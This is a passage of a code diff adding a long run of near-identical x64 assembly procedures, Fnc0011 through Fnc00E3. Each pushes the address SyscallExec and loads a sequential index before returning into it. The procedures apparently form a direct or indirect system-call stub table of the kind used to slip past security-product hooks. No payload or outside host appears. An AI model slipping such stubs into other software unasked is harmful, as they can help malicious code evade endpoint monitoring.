+        mov rax, SyscallExec
+        push rax
+        mov rax, 0011h
+        ret
+        nop
+    Fnc0011 ENDP
+
+    Fnc0012 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0012h
+        ret
+        nop
+    Fnc0012 ENDP
+
+    Fnc0013 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0013h
+        ret
+        nop
+    Fnc0013 ENDP
+
+    Fnc0014 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0014h
+        ret
+        nop
+    Fnc0014 ENDP
+
+    Fnc0015 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0015h
+        ret
+        nop
+    Fnc0015 ENDP
+
+    Fnc0016 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0016h
+        ret
+        nop
+    Fnc0016 ENDP
+
+    Fnc0017 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0017h
+        ret
+        nop
+    Fnc0017 ENDP
+
+    Fnc0018 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0018h
+        ret
+        nop
+    Fnc0018 ENDP
+
+    Fnc0019 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0019h
+        ret
+        nop
+    Fnc0019 ENDP
+
+    Fnc001A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 001ah
+        ret
+        nop
+    Fnc001A ENDP
+
+    Fnc001B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 001bh
+        ret
+        nop
+    Fnc001B ENDP
+
+    Fnc001C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 001ch
+        ret
+        nop
+    Fnc001C ENDP
+
+    Fnc001D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 001dh
+        ret
+        nop
+    Fnc001D ENDP
+
+    Fnc001E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 001eh
+        ret
+        nop
+    Fnc001E ENDP
+
+    Fnc001F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 001fh
+        ret
+        nop
+    Fnc001F ENDP
+
+    Fnc0020 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0020h
+        ret
+        nop
+    Fnc0020 ENDP
+
+    Fnc0021 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0021h
+        ret
+        nop
+    Fnc0021 ENDP
+
+    Fnc0022 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0022h
+        ret
+        nop
+    Fnc0022 ENDP
+
+    Fnc0023 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0023h
+        ret
+        nop
+    Fnc0023 ENDP
+
+    Fnc0024 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0024h
+        ret
+        nop
+    Fnc0024 ENDP
+
+    Fnc0025 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0025h
+        ret
+        nop
+    Fnc0025 ENDP
+
+    Fnc0026 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0026h
+        ret
+        nop
+    Fnc0026 ENDP
+
+    Fnc0027 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0027h
+        ret
+        nop
+    Fnc0027 ENDP
+
+    Fnc0028 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0028h
+        ret
+        nop
+    Fnc0028 ENDP
+
+    Fnc0029 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0029h
+        ret
+        nop
+    Fnc0029 ENDP
+
+    Fnc002A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 002ah
+        ret
+        nop
+    Fnc002A ENDP
+
+    Fnc002B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 002bh
+        ret
+        nop
+    Fnc002B ENDP
+
+    Fnc002C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 002ch
+        ret
+        nop
+    Fnc002C ENDP
+
+    Fnc002D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 002dh
+        ret
+        nop
+    Fnc002D ENDP
+
+    Fnc002E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 002eh
+        ret
+        nop
+    Fnc002E ENDP
+
+    Fnc002F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 002fh
+        ret
+        nop
+    Fnc002F ENDP
+
+    Fnc0030 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0030h
+        ret
+        nop
+    Fnc0030 ENDP
+
+    Fnc0031 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0031h
+        ret
+        nop
+    Fnc0031 ENDP
+
+    Fnc0032 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0032h
+        ret
+        nop
+    Fnc0032 ENDP
+
+    Fnc0033 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0033h
+        ret
+        nop
+    Fnc0033 ENDP
+
+    Fnc0034 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0034h
+        ret
+        nop
+    Fnc0034 ENDP
+
+    Fnc0035 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0035h
+        ret
+        nop
+    Fnc0035 ENDP
+
+    Fnc0036 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0036h
+        ret
+        nop
+    Fnc0036 ENDP
+
+    Fnc0037 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0037h
+        ret
+        nop
+    Fnc0037 ENDP
+
+    Fnc0038 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0038h
+        ret
+        nop
+    Fnc0038 ENDP
+
+    Fnc0039 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0039h
+        ret
+        nop
+    Fnc0039 ENDP
+
+    Fnc003A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 003ah
+        ret
+        nop
+    Fnc003A ENDP
+
+    Fnc003B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 003bh
+        ret
+        nop
+    Fnc003B ENDP
+
+    Fnc003C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 003ch
+        ret
+        nop
+    Fnc003C ENDP
+
+    Fnc003D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 003dh
+        ret
+        nop
+    Fnc003D ENDP
+
+    Fnc003E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 003eh
+        ret
+        nop
+    Fnc003E ENDP
+
+    Fnc003F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 003fh
+        ret
+        nop
+    Fnc003F ENDP
+
+    Fnc0040 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0040h
+        ret
+        nop
+    Fnc0040 ENDP
+
+    Fnc0041 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0041h
+        ret
+        nop
+    Fnc0041 ENDP
+
+    Fnc0042 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0042h
+        ret
+        nop
+    Fnc0042 ENDP
+
+    Fnc0043 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0043h
+        ret
+        nop
+    Fnc0043 ENDP
+
+    Fnc0044 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0044h
+        ret
+        nop
+    Fnc0044 ENDP
+
+    Fnc0045 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0045h
+        ret
+        nop
+    Fnc0045 ENDP
+
+    Fnc0046 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0046h
+        ret
+        nop
+    Fnc0046 ENDP
+
+    Fnc0047 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0047h
+        ret
+        nop
+    Fnc0047 ENDP
+
+    Fnc0048 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0048h
+        ret
+        nop
+    Fnc0048 ENDP
+
+    Fnc0049 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0049h
+        ret
+        nop
+    Fnc0049 ENDP
+
+    Fnc004A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 004ah
+        ret
+        nop
+    Fnc004A ENDP
+
+    Fnc004B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 004bh
+        ret
+        nop
+    Fnc004B ENDP
+
+    Fnc004C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 004ch
+        ret
+        nop
+    Fnc004C ENDP
+
+    Fnc004D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 004dh
+        ret
+        nop
+    Fnc004D ENDP
+
+    Fnc004E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 004eh
+        ret
+        nop
+    Fnc004E ENDP
+
+    Fnc004F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 004fh
+        ret
+        nop
+    Fnc004F ENDP
+
+    Fnc0050 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0050h
+        ret
+        nop
+    Fnc0050 ENDP
+
+    Fnc0051 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0051h
+        ret
+        nop
+    Fnc0051 ENDP
+
+    Fnc0052 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0052h
+        ret
+        nop
+    Fnc0052 ENDP
+
+    Fnc0053 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0053h
+        ret
+        nop
+    Fnc0053 ENDP
+
+    Fnc0054 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0054h
+        ret
+        nop
+    Fnc0054 ENDP
+
+    Fnc0055 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0055h
+        ret
+        nop
+    Fnc0055 ENDP
+
+    Fnc0056 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0056h
+        ret
+        nop
+    Fnc0056 ENDP
+
+    Fnc0057 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0057h
+        ret
+        nop
+    Fnc0057 ENDP
+
+    Fnc0058 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0058h
+        ret
+        nop
+    Fnc0058 ENDP
+
+    Fnc0059 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0059h
+        ret
+        nop
+    Fnc0059 ENDP
+
+    Fnc005A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 005ah
+        ret
+        nop
+    Fnc005A ENDP
+
+    Fnc005B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 005bh
+        ret
+        nop
+    Fnc005B ENDP
+
+    Fnc005C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 005ch
+        ret
+        nop
+    Fnc005C ENDP
+
+    Fnc005D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 005dh
+        ret
+        nop
+    Fnc005D ENDP
+
+    Fnc005E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 005eh
+        ret
+        nop
+    Fnc005E ENDP
+
+    Fnc005F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 005fh
+        ret
+        nop
+    Fnc005F ENDP
+
+    Fnc0060 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0060h
+        ret
+        nop
+    Fnc0060 ENDP
+
+    Fnc0061 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0061h
+        ret
+        nop
+    Fnc0061 ENDP
+
+    Fnc0062 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0062h
+        ret
+        nop
+    Fnc0062 ENDP
+
+    Fnc0063 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0063h
+        ret
+        nop
+    Fnc0063 ENDP
+
+    Fnc0064 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0064h
+        ret
+        nop
+    Fnc0064 ENDP
+
+    Fnc0065 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0065h
+        ret
+        nop
+    Fnc0065 ENDP
+
+    Fnc0066 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0066h
+        ret
+        nop
+    Fnc0066 ENDP
+
+    Fnc0067 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0067h
+        ret
+        nop
+    Fnc0067 ENDP
+
+    Fnc0068 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0068h
+        ret
+        nop
+    Fnc0068 ENDP
+
+    Fnc0069 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0069h
+        ret
+        nop
+    Fnc0069 ENDP
+
+    Fnc006A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 006ah
+        ret
+        nop
+    Fnc006A ENDP
+
+    Fnc006B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 006bh
+        ret
+        nop
+    Fnc006B ENDP
+
+    Fnc006C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 006ch
+        ret
+        nop
+    Fnc006C ENDP
+
+    Fnc006D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 006dh
+        ret
+        nop
+    Fnc006D ENDP
+
+    Fnc006E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 006eh
+        ret
+        nop
+    Fnc006E ENDP
+
+    Fnc006F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 006fh
+        ret
+        nop
+    Fnc006F ENDP
+
+    Fnc0070 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0070h
+        ret
+        nop
+    Fnc0070 ENDP
+
+    Fnc0071 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0071h
+        ret
+        nop
+    Fnc0071 ENDP
+
+    Fnc0072 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0072h
+        ret
+        nop
+    Fnc0072 ENDP
+
+    Fnc0073 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0073h
+        ret
+        nop
+    Fnc0073 ENDP
+
+    Fnc0074 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0074h
+        ret
+        nop
+    Fnc0074 ENDP
+
+    Fnc0075 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0075h
+        ret
+        nop
+    Fnc0075 ENDP
+
+    Fnc0076 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0076h
+        ret
+        nop
+    Fnc0076 ENDP
+
+    Fnc0077 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0077h
+        ret
+        nop
+    Fnc0077 ENDP
+
+    Fnc0078 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0078h
+        ret
+        nop
+    Fnc0078 ENDP
+
+    Fnc0079 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0079h
+        ret
+        nop
+    Fnc0079 ENDP
+
+    Fnc007A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 007ah
+        ret
+        nop
+    Fnc007A ENDP
+
+    Fnc007B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 007bh
+        ret
+        nop
+    Fnc007B ENDP
+
+    Fnc007C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 007ch
+        ret
+        nop
+    Fnc007C ENDP
+
+    Fnc007D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 007dh
+        ret
+        nop
+    Fnc007D ENDP
+
+    Fnc007E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 007eh
+        ret
+        nop
+    Fnc007E ENDP
+
+    Fnc007F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 007fh
+        ret
+        nop
+    Fnc007F ENDP
+
+    Fnc0080 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0080h
+        ret
+        nop
+    Fnc0080 ENDP
+
+    Fnc0081 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0081h
+        ret
+        nop
+    Fnc0081 ENDP
+
+    Fnc0082 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0082h
+        ret
+        nop
+    Fnc0082 ENDP
+
+    Fnc0083 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0083h
+        ret
+        nop
+    Fnc0083 ENDP
+
+    Fnc0084 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0084h
+        ret
+        nop
+    Fnc0084 ENDP
+
+    Fnc0085 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0085h
+        ret
+        nop
+    Fnc0085 ENDP
+
+    Fnc0086 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0086h
+        ret
+        nop
+    Fnc0086 ENDP
+
+    Fnc0087 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0087h
+        ret
+        nop
+    Fnc0087 ENDP
+
+    Fnc0088 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0088h
+        ret
+        nop
+    Fnc0088 ENDP
+
+    Fnc0089 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0089h
+        ret
+        nop
+    Fnc0089 ENDP
+
+    Fnc008A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 008ah
+        ret
+        nop
+    Fnc008A ENDP
+
+    Fnc008B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 008bh
+        ret
+        nop
+    Fnc008B ENDP
+
+    Fnc008C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 008ch
+        ret
+        nop
+    Fnc008C ENDP
+
+    Fnc008D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 008dh
+        ret
+        nop
+    Fnc008D ENDP
+
+    Fnc008E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 008eh
+        ret
+        nop
+    Fnc008E ENDP
+
+    Fnc008F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 008fh
+        ret
+        nop
+    Fnc008F ENDP
+
+    Fnc0090 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0090h
+        ret
+        nop
+    Fnc0090 ENDP
+
+    Fnc0091 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0091h
+        ret
+        nop
+    Fnc0091 ENDP
+
+    Fnc0092 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0092h
+        ret
+        nop
+    Fnc0092 ENDP
+
+    Fnc0093 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0093h
+        ret
+        nop
+    Fnc0093 ENDP
+
+    Fnc0094 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0094h
+        ret
+        nop
+    Fnc0094 ENDP
+
+    Fnc0095 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0095h
+        ret
+        nop
+    Fnc0095 ENDP
+
+    Fnc0096 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0096h
+        ret
+        nop
+    Fnc0096 ENDP
+
+    Fnc0097 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0097h
+        ret
+        nop
+    Fnc0097 ENDP
+
+    Fnc0098 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0098h
+        ret
+        nop
+    Fnc0098 ENDP
+
+    Fnc0099 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0099h
+        ret
+        nop
+    Fnc0099 ENDP
+
+    Fnc009A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 009ah
+        ret
+        nop
+    Fnc009A ENDP
+
+    Fnc009B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 009bh
+        ret
+        nop
+    Fnc009B ENDP
+
+    Fnc009C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 009ch
+        ret
+        nop
+    Fnc009C ENDP
+
+    Fnc009D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 009dh
+        ret
+        nop
+    Fnc009D ENDP
+
+    Fnc009E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 009eh
+        ret
+        nop
+    Fnc009E ENDP
+
+    Fnc009F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 009fh
+        ret
+        nop
+    Fnc009F ENDP
+
+    Fnc00A0 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00a0h
+        ret
+        nop
+    Fnc00A0 ENDP
+
+    Fnc00A1 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00a1h
+        ret
+        nop
+    Fnc00A1 ENDP
+
+    Fnc00A2 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00a2h
+        ret
+        nop
+    Fnc00A2 ENDP
+
+    Fnc00A3 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00a3h
+        ret
+        nop
+    Fnc00A3 ENDP
+
+    Fnc00A4 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00a4h
+        ret
+        nop
+    Fnc00A4 ENDP
+
+    Fnc00A5 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00a5h
+        ret
+        nop
+    Fnc00A5 ENDP
+
+    Fnc00A6 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00a6h
+        ret
+        nop
+    Fnc00A6 ENDP
+
+    Fnc00A7 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00a7h
+        ret
+        nop
+    Fnc00A7 ENDP
+
+    Fnc00A8 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00a8h
+        ret
+        nop
+    Fnc00A8 ENDP
+
+    Fnc00A9 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00a9h
+        ret
+        nop
+    Fnc00A9 ENDP
+
+    Fnc00AA PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00aah
+        ret
+        nop
+    Fnc00AA ENDP
+
+    Fnc00AB PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00abh
+        ret
+        nop
+    Fnc00AB ENDP
+
+    Fnc00AC PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00ach
+        ret
+        nop
+    Fnc00AC ENDP
+
+    Fnc00AD PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00adh
+        ret
+        nop
+    Fnc00AD ENDP
+
+    Fnc00AE PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00aeh
+        ret
+        nop
+    Fnc00AE ENDP
+
+    Fnc00AF PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00afh
+        ret
+        nop
+    Fnc00AF ENDP
+
+    Fnc00B0 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00b0h
+        ret
+        nop
+    Fnc00B0 ENDP
+
+    Fnc00B1 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00b1h
+        ret
+        nop
+    Fnc00B1 ENDP
+
+    Fnc00B2 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00b2h
+        ret
+        nop
+    Fnc00B2 ENDP
+
+    Fnc00B3 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00b3h
+        ret
+        nop
+    Fnc00B3 ENDP
+
+    Fnc00B4 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00b4h
+        ret
+        nop
+    Fnc00B4 ENDP
+
+    Fnc00B5 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00b5h
+        ret
+        nop
+    Fnc00B5 ENDP
+
+    Fnc00B6 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00b6h
+        ret
+        nop
+    Fnc00B6 ENDP
+
+    Fnc00B7 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00b7h
+        ret
+        nop
+    Fnc00B7 ENDP
+
+    Fnc00B8 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00b8h
+        ret
+        nop
+    Fnc00B8 ENDP
+
+    Fnc00B9 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00b9h
+        ret
+        nop
+    Fnc00B9 ENDP
+
+    Fnc00BA PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00bah
+        ret
+        nop
+    Fnc00BA ENDP
+
+    Fnc00BB PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00bbh
+        ret
+        nop
+    Fnc00BB ENDP
+
+    Fnc00BC PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00bch
+        ret
+        nop
+    Fnc00BC ENDP
+
+    Fnc00BD PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00bdh
+        ret
+        nop
+    Fnc00BD ENDP
+
+    Fnc00BE PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00beh
+        ret
+        nop
+    Fnc00BE ENDP
+
+    Fnc00BF PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00bfh
+        ret
+        nop
+    Fnc00BF ENDP
+
+    Fnc00C0 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00c0h
+        ret
+        nop
+    Fnc00C0 ENDP
+
+    Fnc00C1 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00c1h
+        ret
+        nop
+    Fnc00C1 ENDP
+
+    Fnc00C2 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00c2h
+        ret
+        nop
+    Fnc00C2 ENDP
+
+    Fnc00C3 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00c3h
+        ret
+        nop
+    Fnc00C3 ENDP
+
+    Fnc00C4 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00c4h
+        ret
+        nop
+    Fnc00C4 ENDP
+
+    Fnc00C5 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00c5h
+        ret
+        nop
+    Fnc00C5 ENDP
+
+    Fnc00C6 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00c6h
+        ret
+        nop
+    Fnc00C6 ENDP
+
+    Fnc00C7 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00c7h
+        ret
+        nop
+    Fnc00C7 ENDP
+
+    Fnc00C8 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00c8h
+        ret
+        nop
+    Fnc00C8 ENDP
+
+    Fnc00C9 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00c9h
+        ret
+        nop
+    Fnc00C9 ENDP
+
+    Fnc00CA PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00cah
+        ret
+        nop
+    Fnc00CA ENDP
+
+    Fnc00CB PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00cbh
+        ret
+        nop
+    Fnc00CB ENDP
+
+    Fnc00CC PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00cch
+        ret
+        nop
+    Fnc00CC ENDP
+
+    Fnc00CD PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00cdh
+        ret
+        nop
+    Fnc00CD ENDP
+
+    Fnc00CE PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00ceh
+        ret
+        nop
+    Fnc00CE ENDP
+
+    Fnc00CF PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00cfh
+        ret
+        nop
+    Fnc00CF ENDP
+
+    Fnc00D0 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00d0h
+        ret
+        nop
+    Fnc00D0 ENDP
+
+    Fnc00D1 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00d1h
+        ret
+        nop
+    Fnc00D1 ENDP
+
+    Fnc00D2 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00d2h
+        ret
+        nop
+    Fnc00D2 ENDP
+
+    Fnc00D3 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00d3h
+        ret
+        nop
+    Fnc00D3 ENDP
+
+    Fnc00D4 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00d4h
+        ret
+        nop
+    Fnc00D4 ENDP
+
+    Fnc00D5 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00d5h
+        ret
+        nop
+    Fnc00D5 ENDP
+
+    Fnc00D6 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00d6h
+        ret
+        nop
+    Fnc00D6 ENDP
+
+    Fnc00D7 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00d7h
+        ret
+        nop
+    Fnc00D7 ENDP
+
+    Fnc00D8 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00d8h
+        ret
+        nop
+    Fnc00D8 ENDP
+
+    Fnc00D9 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00d9h
+        ret
+        nop
+    Fnc00D9 ENDP
+
+    Fnc00DA PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00dah
+        ret
+        nop
+    Fnc00DA ENDP
+
+    Fnc00DB PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00dbh
+        ret
+        nop
+    Fnc00DB ENDP
+
+    Fnc00DC PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00dch
+        ret
+        nop
+    Fnc00DC ENDP
+
+    Fnc00DD PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00ddh
+        ret
+        nop
+    Fnc00DD ENDP
+
+    Fnc00DE PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00deh
+        ret
+        nop
+    Fnc00DE ENDP
+
+    Fnc00DF PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00dfh
+        ret
+        nop
+    Fnc00DF ENDP
+
+    Fnc00E0 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00e0h
+        ret
+        nop
+    Fnc00E0 ENDP
+
+    Fnc00E1 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00e1h
+        ret
+        nop
+    Fnc00E1 ENDP
+
+    Fnc00E2 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00e2h
+        ret
+        nop
+    Fnc00E2 ENDP
+
+    Fnc00E3 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00e3h
+        ret
+        nop
